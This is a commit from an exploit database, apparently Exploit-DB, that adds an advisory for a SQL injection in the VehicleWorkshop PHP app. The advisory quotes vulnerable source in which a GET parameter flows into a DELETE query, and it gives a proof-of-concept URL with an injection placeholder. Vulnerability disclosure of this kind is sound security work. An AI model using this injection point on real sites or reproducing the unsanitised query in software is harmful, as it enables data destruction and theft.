DB: 2017-07-31
1 new exploits VehicleWorkshop - SQL Injection
This commit is contained in:
parent
25e79a8750
commit
5040eaef41
2 changed files with 36 additions and 0 deletions
|
@ -37914,6 +37914,7 @@ id,file,description,date,author,platform,type,port
|
|||
41572,platforms/hardware/webapps/41572.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Session Stealing",2017-03-08,"Bruno Bierbaumer",hardware,webapps,0
|
||||
41573,platforms/hardware/webapps/41573.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Remote Code Execution",2017-03-08,"Bruno Bierbaumer",hardware,webapps,0
|
||||
41574,platforms/xml/webapps/41574.html,"FTP Voyager Scheduler 16.2.0 - Cross-Site Request Forgery",2017-03-10,hyp3rlinx,xml,webapps,52986
|
||||
42393,platforms/php/webapps/42393.txt,"VehicleWorkshop - SQL Injection",2017-07-28,"Shahab Shamsi",php,webapps,0
|
||||
42392,platforms/multiple/webapps/42392.py,"GitHub Enterprise < 2.8.7 - Remote Code Execution",2017-03-15,orange,multiple,webapps,0
|
||||
41577,platforms/jsp/webapps/41577.txt,"Kinsey Infor/Lawson / ESBUS - SQL Injection",2017-03-10,"Michael Benich",jsp,webapps,0
|
||||
41579,platforms/xml/webapps/41579.html,"WatchGuard XTMv 11.12 Build 516911 - User Management Cross-Site Request Forgery",2017-03-10,KoreLogic,xml,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
35
platforms/php/webapps/42393.txt
Executable file
35
platforms/php/webapps/42393.txt
Executable file
|
@ -0,0 +1,35 @@
|
|||
# Exploit Title: VehicleWorkshop SQL Injection
|
||||
# Data: 07.28.2017
|
||||
# Exploit Author: Shahab Shamsi
|
||||
# Vendor HomagePage: https://github.com/spiritson/VehicleWorkshop
|
||||
# Tested on: Windows
|
||||
# Google Dork: N/A
|
||||
|
||||
|
||||
=========
|
||||
Vulnerable Page:
|
||||
=========
|
||||
/viewvehiclestoremore.php
|
||||
|
||||
|
||||
==========
|
||||
Vulnerable Source:
|
||||
==========
|
||||
Line5: if(isset($_GET['vahicleid']))
|
||||
Line7: $results = mysql_query("DELETE from vehiclestore where vehicleid ='$_GET[vahicleid]'");
|
||||
|
||||
|
||||
|
||||
=========
|
||||
POC:
|
||||
=========
|
||||
http://site.com/viewvehiclestoremore.php?vahicleid=[SQL]
|
||||
|
||||
|
||||
|
||||
=========
|
||||
Contact Me :
|
||||
=========
|
||||
Telegram : @Shahab_Shamsi
|
||||
Email : info@securityman.org
|
||||
WebSilte : WwW.iran123.Org
|
Loading…
Add table
Reference in a new issue